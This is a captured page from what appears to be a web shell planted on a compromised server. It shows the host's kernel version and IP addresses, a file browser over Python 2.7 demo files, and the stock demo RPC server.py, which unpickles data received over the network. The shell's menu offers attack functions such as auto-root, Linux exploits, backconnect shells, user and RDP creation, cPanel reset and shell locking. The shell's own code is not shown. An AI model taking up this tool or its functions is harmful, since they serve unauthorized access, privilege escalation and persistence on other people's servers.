Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.116.85.204
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib64 /
python2.7 /
Demo /
pdist /
[ HOME SHELL ]
Name
Size
Permission
Action
FSProxy.py
7.64
KB
-rw-r--r--
FSProxy.pyc
12.49
KB
-rw-r--r--
FSProxy.pyo
12.49
KB
-rw-r--r--
RCSProxy.py
4.61
KB
-rwxr-xr-x
RCSProxy.pyc
7.57
KB
-rw-r--r--
RCSProxy.pyo
7.57
KB
-rw-r--r--
README
4.16
KB
-rw-r--r--
client.py
4.6
KB
-rw-r--r--
client.pyc
6.57
KB
-rw-r--r--
client.pyo
6.57
KB
-rw-r--r--
cmdfw.py
4.53
KB
-rw-r--r--
cmdfw.pyc
5.12
KB
-rw-r--r--
cmdfw.pyo
5.12
KB
-rw-r--r--
cmptree.py
5.64
KB
-rw-r--r--
cmptree.pyc
5.98
KB
-rw-r--r--
cmptree.pyo
5.98
KB
-rw-r--r--
cvslib.py
9.94
KB
-rw-r--r--
cvslib.pyc
12.83
KB
-rw-r--r--
cvslib.pyo
12.83
KB
-rw-r--r--
cvslock.py
6.61
KB
-rw-r--r--
cvslock.pyc
8.36
KB
-rw-r--r--
cvslock.pyo
8.36
KB
-rw-r--r--
mac.py
352
B
-rw-r--r--
mac.pyc
597
B
-rw-r--r--
mac.pyo
597
B
-rw-r--r--
makechangelog.py
2.92
KB
-rwxr-xr-x
makechangelog.pyc
3.04
KB
-rw-r--r--
makechangelog.pyo
3.04
KB
-rw-r--r--
rcsbump
742
B
-rwxr-xr-x
rcsclient.py
1.76
KB
-rw-r--r--
rcsclient.pyc
2.05
KB
-rw-r--r--
rcsclient.pyo
2.05
KB
-rw-r--r--
rcslib.py
10.08
KB
-rw-r--r--
rcslib.pyc
11.28
KB
-rw-r--r--
rcslib.pyo
11.28
KB
-rw-r--r--
rcvs
114
B
-rwxr-xr-x
rcvs.py
13.33
KB
-rwxr-xr-x
rcvs.pyc
14.08
KB
-rw-r--r--
rcvs.pyo
14.08
KB
-rw-r--r--
rrcs
114
B
-rwxr-xr-x
rrcs.py
3.9
KB
-rwxr-xr-x
rrcs.pyc
5.5
KB
-rw-r--r--
rrcs.pyo
5.5
KB
-rw-r--r--
security.py
1.07
KB
-rw-r--r--
security.pyc
1.64
KB
-rw-r--r--
security.pyo
1.64
KB
-rw-r--r--
server.py
4.47
KB
-rw-r--r--
server.pyc
5.83
KB
-rw-r--r--
server.pyo
5.83
KB
-rw-r--r--
sumtree.py
518
B
-rw-r--r--
sumtree.pyc
903
B
-rw-r--r--
sumtree.pyo
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server.py
"""RPC Server module.""" import sys import socket import pickle from fnmatch import fnmatch from repr import repr # Default verbosity (0 = silent, 1 = print connections, 2 = print requests too) VERBOSE = 1 class Server: """RPC Server class. Derive a class to implement a particular service.""" def __init__(self, address, verbose = VERBOSE): if type(address) == type(0): address = ('', address) self._address = address self._verbose = verbose self._socket = None self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self._socket.bind(address) self._socket.listen(1) self._listening = 1 def _setverbose(self, verbose): self._verbose = verbose def __del__(self): self._close() def _close(self): self._listening = 0 if self._socket: self._socket.close() self._socket = None def _serverloop(self): while self._listening: self._serve() def _serve(self): if self._verbose: print "Wait for connection ..." conn, address = self._socket.accept() if self._verbose: print "Accepted connection from %s" % repr(address) if not self._verify(conn, address): print "*** Connection from %s refused" % repr(address) conn.close() return rf = conn.makefile('r') wf = conn.makefile('w') ok = 1 while ok: wf.flush() if self._verbose > 1: print "Wait for next request ..." ok = self._dorequest(rf, wf) _valid = ['192.16.201.*', '192.16.197.*', '132.151.1.*', '129.6.64.*'] def _verify(self, conn, address): host, port = address for pat in self._valid: if fnmatch(host, pat): return 1 return 0 def _dorequest(self, rf, wf): rp = pickle.Unpickler(rf) try: request = rp.load() except EOFError: return 0 if self._verbose > 1: print "Got request: %s" % repr(request) try: methodname, args, id = request if '.' in methodname: reply = (None, self._special(methodname, args), id) elif methodname[0] == '_': raise NameError, "illegal method name %s" % repr(methodname) else: method = getattr(self, methodname) reply = (None, apply(method, args), id) except: reply = (sys.exc_type, sys.exc_value, id) if id < 0 and reply[:2] == (None, None): if self._verbose > 1: print "Suppress reply" return 1 if self._verbose > 1: print "Send reply: %s" % repr(reply) wp = pickle.Pickler(wf) wp.dump(reply) return 1 def _special(self, methodname, args): if methodname == '.methods': if not hasattr(self, '_methods'): self._methods = tuple(self._listmethods()) return self._methods raise NameError, "unrecognized special method name %s" % repr(methodname) def _listmethods(self, cl=None): if not cl: cl = self.__class__ names = cl.__dict__.keys() names = filter(lambda x: x[0] != '_', names) names.sort() for base in cl.__bases__: basenames = self._listmethods(base) basenames = filter(lambda x, names=names: x not in names, basenames) names[len(names):] = basenames return names from security import Security class SecureServer(Server, Security): def __init__(self, *args): apply(Server.__init__, (self,) + args) Security.__init__(self) def _verify(self, conn, address): import string challenge = self._generate_challenge() conn.send("%d\n" % challenge) response = "" while "\n" not in response and len(response) < 100: data = conn.recv(100) if not data: break response = response + data try: response = string.atol(string.strip(response)) except string.atol_error: if self._verbose > 0: print "Invalid response syntax", repr(response) return 0 if not self._compare_challenge_response(challenge, response): if self._verbose > 0: print "Invalid response value", repr(response) return 0 if self._verbose > 1: print "Response matches challenge. Go ahead!" return 1
Close